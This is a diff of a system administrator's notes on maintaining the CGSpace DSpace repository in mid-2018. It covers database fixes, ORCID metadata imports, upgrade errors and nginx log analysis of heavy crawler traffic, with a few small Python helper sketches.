    +Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0' defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name 'itemCollectionPlugin' defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
     
    • I can fix this by commenting out the ItemCollectionPlugin line of discovery.xml, but from looking at the git log I’m not actually sure if that is related to MQM or not
    • I will have to ask Atmire
    • @@ -336,11 +336,11 @@ Failed to startup the DSpace Service Manager: failure starting up spring service
    or(
    -  value.contains('€'),
    -  value.contains('6g'),
    -  value.contains('6m'),
    -  value.contains('6d'),
    -  value.contains('6e')
    +  value.contains('€'),
    +  value.contains('6g'),
    +  value.contains('6m'),
    +  value.contains('6d'),
    +  value.contains('6e')
     )
     
    • So IITA should double check the abstracts for these:
    @@ -357,24 +357,24 @@ Failed to startup the DSpace Service Manager: failure starting up spring service
    • Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Robin Buruchara’s items
    • I used my add-orcid-identifiers-csv.py script:
    -
    $ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p 'fuuu'
     
    • The contents of 2018-06-13-Robin-Buruchara.csv were:
    dc.contributor.author,cg.creator.id
    -"Buruchara, Robin",Robin Buruchara: 0000-0003-0934-1218
    -"Buruchara, Robin A.",Robin Buruchara: 0000-0003-0934-1218
    +"Buruchara, Robin",Robin Buruchara: 0000-0003-0934-1218
    +"Buruchara, Robin A.",Robin Buruchara: 0000-0003-0934-1218
     
    • On a hunch I checked to see if CGSpace’s bitstream cleanup was working properly and of course it’s broken:
    $ dspace cleanup -v
     ...
    -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(152402) is still referenced from table "bundle".
    +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(152402) is still referenced from table "bundle".
     
    • As always, the solution is to delete that ID manually in PostgreSQL:
    -
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);'
    +
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);'
     UPDATE 1
     

    2018-06-14

      @@ -389,9 +389,9 @@ UPDATE 1
    $ dropdb -h localhost -U postgres dspacetest
     $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
    -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
    +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
     $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost /tmp/cgspace_2018-06-24.backup
    -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
    +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
     
    • The -O option to pg_restore makes the import process ignore ownership specified in the dump itself, and instead makes the schema owned by the user doing the restore
    • I always prefer to use the postgres user locally because it’s just easier than remembering the dspacetest user’s password, but then I couldn’t figure out why the resulting schema was owned by postgres
    • @@ -413,13 +413,13 @@ $ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser
    • So I need to make sure to run the following during the DSpace 5.8 upgrade:
    -- Delete existing CUA 4 migration if it exists
    -delete from schema_version where version = '5.6.2015.12.03.2';
    +delete from schema_version where version = '5.6.2015.12.03.2';
     
     -- Update version of CUA 4 migration
    -update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
    +update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
     
    --- Delete MQM migration since we're no longer using it
    -delete from schema_version where version = '5.5.2015.12.03.3';
    +-- Delete MQM migration since we're no longer using it
    +delete from schema_version where version = '5.5.2015.12.03.3';
     
    • After that you can run the migrations manually and then DSpace should work fine:
    @@ -427,17 +427,17 @@ delete from schema_version where version = '5.5.2015.12.03.3'; ... Done.
      -
    • Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis' items on CGSpace
    • +
    • Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis’ items on CGSpace
    • I used my add-orcid-identifiers-csv.py script:
    -
    $ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p 'fuuu'
     
    • The contents of 2018-06-24-andy-jarvis-orcid.csv were:
    dc.contributor.author,cg.creator.id
    -"Jarvis, A.",Andy Jarvis: 0000-0001-6543-0798
    -"Jarvis, Andy",Andy Jarvis: 0000-0001-6543-0798
    -"Jarvis, Andrew",Andy Jarvis: 0000-0001-6543-0798
    +"Jarvis, A.",Andy Jarvis: 0000-0001-6543-0798
    +"Jarvis, Andy",Andy Jarvis: 0000-0001-6543-0798
    +"Jarvis, Andrew",Andy Jarvis: 0000-0001-6543-0798
     

    2018-06-26

    • Atmire got back to me to say that we can remove the itemCollectionPlugin and HasBitstreamsSSIPlugin beans from DSpace’s discovery.xml file, as they are used by the Metadata Quality Module (MQM) that we are not using anymore
    • @@ -455,19 +455,19 @@ Done.
    • I’ll have to figure out how to separate those we’re keeping, deleting, and mapping into CIFOR’s archive collection
    • First, get the 62 deletes from Vika’s file and remove them from the collection:
    -
    $ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' > cifor-handle-to-delete.txt
    +
    $ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' > cifor-handle-to-delete.txt
     $ wc -l cifor-handle-to-delete.txt
     62 cifor-handle-to-delete.txt
     $ wc -l 10568-92904.csv
     2461 10568-92904.csv
    -$ while read line; do sed -i "\#$line#d" 10568-92904.csv; done < cifor-handle-to-delete.txt
    +$ while read line; do sed -i "\#$line#d" 10568-92904.csv; done < cifor-handle-to-delete.txt
     $ wc -l 10568-92904.csv
     2399 10568-92904.csv
     
    • This iterates over the handles for deletion and uses sed with an alternative pattern delimiter of ‘#’ (which must be escaped), because the pattern itself contains a ‘/’
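• The same filtering could be sketched in Python, where the ‘/’ in the handles needs no special treatment because a plain substring test is used instead of a sed pattern. The function name and the sample handles and rows below are made up for illustration.

```python
def remove_lines_with_handles(lines, handles):
    """Drop every line that contains any of the given handles as a substring."""
    wanted = [handle.strip() for handle in handles if handle.strip()]
    return [line for line in lines if not any(handle in line for handle in wanted)]


# Hypothetical data: a header, three items, and one handle marked for deletion
rows = [
    "id,collection,dc.identifier.uri",
    "1,10568/92904,https://hdl.handle.net/10568/00001",
    "2,10568/92904,https://hdl.handle.net/10568/00002",
    "3,10568/92904,https://hdl.handle.net/10568/00003",
]
to_delete = ["10568/00002\n"]
print(remove_lines_with_handles(rows, to_delete))
```

Like the sed loop, this matches anywhere in the line, so a handle that is a prefix of a longer handle would also remove the longer one.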
    • The mapped ones will be difficult because we need their internal IDs in order to map them, and there are 50 of them:
    -
    $ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' > cifor-handle-to-map.txt
    +
    $ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' > cifor-handle-to-map.txt
     $ wc -l cifor-handle-to-map.txt
     50 cifor-handle-to-map.txt
     
      @@ -475,7 +475,7 @@ $ wc -l cifor-handle-to-map.txt
    • Oooh, I can export the items one by one, concatenate them together, remove the headers, and extract the id and collection columns using csvkit:
    $ while read line; do filename=${line/\//-}.csv; dspace metadata-export -i $line -f $filename; done < /tmp/cifor-handle-to-map.txt
    -$ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 > map-to-cifor-archive.csv
    +$ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 > map-to-cifor-archive.csv
     
    • Then I can use OpenRefine to add the “CIFOR Archive” collection to the mappings
    • Importing the 2398 items via dspace metadata-import ends up with a Java garbage collection error, so I think I need to do it in batches of 1,000
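• Splitting the CSV into batches could be done with something like the sketch below, which repeats the header row in every batch so that each piece can be imported on its own. The function name split_csv and the in-memory string handling are assumptions for illustration, and it expects at least a header row in the input; with 2,398 items and a batch size of 1,000 it would produce three batches (1,000, 1,000, and 398 rows).

```python
import csv
import io


def split_csv(text, batch_size=1000):
    """Split CSV text into CSV strings, each with the header and up to batch_size rows."""
    reader = csv.reader(io.StringIO(text))
    header = next(reader)
    rows = list(reader)
    batches = []
    for start in range(0, len(rows), batch_size):
        out = io.StringIO()
        writer = csv.writer(out, lineterminator="\n")
        writer.writerow(header)
        writer.writerows(rows[start:start + batch_size])
        batches.append(out.getvalue())
    return batches


# Small made-up example with a batch size of 2
example = "id,collection\n1,a\n2,b\n3,c\n"
for batch in split_csv(example, batch_size=2):
    print(batch)
```

Each returned string can be written to its own file and passed to dspace metadata-import separately.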
    • diff --git a/docs/2018-07/index.html b/docs/2018-07/index.html index 30fa9e0ce..df201be40 100644 --- a/docs/2018-07/index.html +++ b/docs/2018-07/index.html @@ -36,7 +36,7 @@ During the mvn package stage on the 5.8 branch I kept getting issues with java r There is insufficient memory for the Java Runtime Environment to continue. "/> - + @@ -134,7 +134,7 @@ There is insufficient memory for the Java Runtime Environment to continue.
    • As the machine only has 8GB of RAM, I reduced the Tomcat memory heap from 5120m to 4096m so I could try to allocate more to the build process:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
     $ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=dspacetest.cgiar.org -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2 clean package
     
    • Then I stopped the Tomcat 7 service, ran the ant update, and manually ran the old and ignored SQL migrations:
    • @@ -171,17 +171,17 @@ $ dspace database migrate ignored
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
     $ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive.csv
     $ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive2.csv
     
    • I noticed there are many items that use HTTP instead of HTTPS for their Google Books URL, and some missing HTTP entirely:
    -
    dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
    +
    dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
      count
     -------
        785
    -dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
    +dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
      count
     -------
          4
    @@ -189,11 +189,11 @@ dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadat
     
  • I think I should fix that as well as some other garbage values like “test” and “dspace.ilri.org” etc:
  • dspace=# begin;
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
     UPDATE 785
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
     UPDATE 4
    -dspace=# update metadatavalue set text_value='https://books.google.com/books?id=meF1CLdPSF4C' where resource_type_id=2 and metadata_field_id=222 and text_value='meF1CLdPSF4C';
    +dspace=# update metadatavalue set text_value='https://books.google.com/books?id=meF1CLdPSF4C' where resource_type_id=2 and metadata_field_id=222 and text_value='meF1CLdPSF4C';
     UPDATE 1
     dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=222 and metadata_value_id in (2299312, 10684, 10700, 996403);
     DELETE 4
    @@ -202,7 +202,7 @@ dspace=# commit;
     
  • Testing DSpace 5.8 with PostgreSQL 9.6 and Tomcat 8.5.32 (instead of my usual 7.0.88) and for some reason I get autowire errors on Catalina startup with 8.5.32:
  • 03-Jul-2018 19:51:37.272 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
    - java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
    + java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
     	at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
     	at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4792)
     	at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5256)
    @@ -217,7 +217,7 @@ dspace=# commit;
     	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
     	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
     	at java.lang.Thread.run(Thread.java:748)
    -Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
    +Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
     
    • Gotta check that out later…
    @@ -249,7 +249,7 @@ Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Mana
  • Abenet wants to be able to search by journal title (dc.source) in the advanced Discovery search so I opened an issue for it (#384)
  • I regenerated the list of names for all our ORCID iDs using my resolve-orcids.py script:
  • -
    $ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq > /tmp/2018-07-08-orcids.txt
    +
    $ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq > /tmp/2018-07-08-orcids.txt
     $ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt -d
     
    • But after comparing to the existing list of names I didn’t see much change, so I just ignored it
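The `grep -oE ... | sort | uniq` step above can also be sketched in Python, which may be handy when the extraction needs to live inside a script. This is a minimal sketch, not part of `resolve-orcids.py`: the function name `extract_orcids` and the sample text are assumptions for illustration, and only the regular expression is taken from the command above.

```python
import re

# Same pattern as the grep -oE call above: four dash-separated groups of
# four characters each (upper-case letters or digits).
ORCID_PATTERN = re.compile(r"[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}")


def extract_orcids(text):
    """Return the sorted, de-duplicated ORCID iDs found in text."""
    return sorted(set(ORCID_PATTERN.findall(text)))


# Hypothetical sample standing in for the contents of cg-creator-id.xml.
sample = """
Bruce M Campbell: 0000-0002-0123-4859
Kris Wyckhuys: 0000-0003-0922-488X
Bruce M Campbell: 0000-0002-0123-4859
"""

for orcid in extract_orcids(sample):
    print(orcid)
```

Note that Python sorts by code point, while `sort` follows the shell locale, so the order may differ slightly for mixed letters and digits.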
    • @@ -259,7 +259,7 @@ $ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt
    • Uptime Robot said that CGSpace was down for two minutes early this morning but I don’t see anything in Tomcat logs or dmesg
    • Uptime Robot said that CGSpace was down for two minutes again later in the day, and this time I saw a memory error in Tomcat’s catalina.out:
    -
    Exception in thread "http-bio-127.0.0.1-8081-exec-557" java.lang.OutOfMemoryError: Java heap space
    +
    Exception in thread "http-bio-127.0.0.1-8081-exec-557" java.lang.OutOfMemoryError: Java heap space
     
    • I’m not sure if it’s the same error, but I see this in DSpace’s solr.log:
    @@ -274,7 +274,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
  • I got a message from Linode tonight that CPU usage was high on CGSpace for the past few hours around 8PM GMT
  • Looking in the nginx logs I see the top ten IP addresses active today:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "09/Jul/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "09/Jul/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1691 40.77.167.84
        1701 40.77.167.69
        1718 50.116.102.77
    @@ -288,7 +288,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
     
    • Of those, all except 70.32.83.92 and 50.116.102.77 are NOT re-using their Tomcat sessions, for example from the XMLUI logs:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-07-09
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-07-09
     4435
     
    • 95.108.181.88 appears to be Yandex, so I dunno why it’s creating so many sessions, as its user agent should match Tomcat’s Crawler Session Manager Valve
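The `zcat ... | grep ... | awk '{print $1}' | sort | uniq -c | sort -n | tail` pipeline used above for the top ten IPs can be approximated in Python. This is a rough sketch under assumptions: `top_clients` is a hypothetical helper, the sample log lines are made up (only their general shape follows the nginx lines quoted in these notes), and it reads from an in-memory list rather than the rotated log files.

```python
from collections import Counter


def top_clients(lines, date, n=10):
    """Count requests per client for log lines that contain `date`."""
    counts = Counter(
        line.split()[0]  # first whitespace-separated field, like awk '{print $1}'
        for line in lines
        if date in line  # plain substring match, like grep "10/Jul/2018"
    )
    # most_common() sorts from busiest to quietest, the reverse of `sort -n | tail`.
    return counts.most_common(n)


# Hypothetical log lines for illustration only.
sample_log = [
    '213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] "GET /a HTTP/2.0" 200 1',
    '213.139.52.250 - - [10/Jul/2018:13:39:42 +0000] "GET /b HTTP/2.0" 200 1',
    '40.77.167.90 - - [10/Jul/2018:13:40:00 +0000] "GET /c HTTP/1.1" 200 1',
    '40.77.167.90 - - [09/Jul/2018:13:40:00 +0000] "GET /d HTTP/1.1" 200 1',
]

for ip, hits in top_clients(sample_log, "10/Jul/2018"):
    print(f"{hits:7d} {ip}")
```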
    • @@ -314,7 +314,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
    • Linode sent an alert about CPU usage on CGSpace again, about 13:00UTC
    • These are the top ten users in the last two hours:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Jul/2018:(11|12|13)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Jul/2018:(11|12|13)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          81 193.95.22.113
          82 50.116.102.77
         112 40.77.167.90
    @@ -328,7 +328,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
     
    • Looks like 213.139.52.250 is Moayad testing his new CGSpace visualization thing:
    -
    213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] "GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0" 200 53750 "http://localhost:4200/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
    +
    213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] "GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0" 200 53750 "http://localhost:4200/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
     
    • He said there was a bug that caused his app to request a bunch of invalid URLs
    • I’ll have to keep an eye on this and see how their platform evolves
    • @@ -349,7 +349,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
    • Uptime Robot said that CGSpace went down a few times last night, around 10:45 PM and 12:30 AM
    • Here are the top ten IPs from last night and this morning:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "11/Jul/2018:22" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "11/Jul/2018:22" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          48 66.249.64.91
          50 35.227.26.162
          57 157.55.39.234
    @@ -360,7 +360,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
          97 183.128.40.185
          97 240e:f0:44:fa53:745a:8afe:d221:1232
        3634 208.110.72.10
    -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "12/Jul/2018:00" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "12/Jul/2018:00" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          25 216.244.66.198
          38 40.77.167.185
          46 66.249.64.93
    @@ -377,21 +377,21 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
     
  • A brief Google search doesn’t turn up any information about what this bot is, but lots of users complaining about it
  • This bot does make a lot of requests all through the day, although it seems to re-use its Tomcat session:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
       17098 208.110.72.10
    -# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-11
    +# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-11
     1161
    -# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-12
    +# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-12
     1885
     
    • I think the problem is that, despite the bot requesting robots.txt, it almost exclusively requests dynamic pages from /discover:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | grep -o -E "GET /(browse|discover|search-filter)" | sort -n | uniq -c | sort -rn
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | grep -o -E "GET /(browse|discover|search-filter)" | sort -n | uniq -c | sort -rn
       13364 GET /discover
         993 GET /search-filter
         804 GET /browse
    -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | grep robots
    -208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] "GET /robots.txt HTTP/1.1" 200 1301 "https://cgspace.cgiar.org/robots.txt" "Pcore-HTTP/v0.44.0"
    +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | grep robots
    +208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] "GET /robots.txt HTTP/1.1" 200 1301 "https://cgspace.cgiar.org/robots.txt" "Pcore-HTTP/v0.44.0"
     
    • So this bot is just like Baiduspider, and I need to add it to the nginx rate limiting
    • I’ll also add it to Tomcat’s Crawler Session Manager Valve to force the re-use of a common Tomcat session for all crawlers just in case
    • @@ -408,7 +408,7 @@ $ csvcut -c 1 < /tmp/affiliations.csv > /tmp/affiliations-1.csv
      • Generate a list of affiliations for Peter and Abenet to go over so we can batch correct them before we deploy the new data visualization dashboard:
      -
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
      +
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
       COPY 4518
       

      2018-07-15

        @@ -438,14 +438,14 @@ OAI 2.0 manager action ended. It took 697 seconds.
      • I need to ask the dspace-tech mailing list if the nightly OAI import catches the case of old items that have had metadata or mappings change
      • ICARDA sent me a list of the ORCID iDs they have in the MEL system and it looks like almost 150 are new and unique to us!
      -
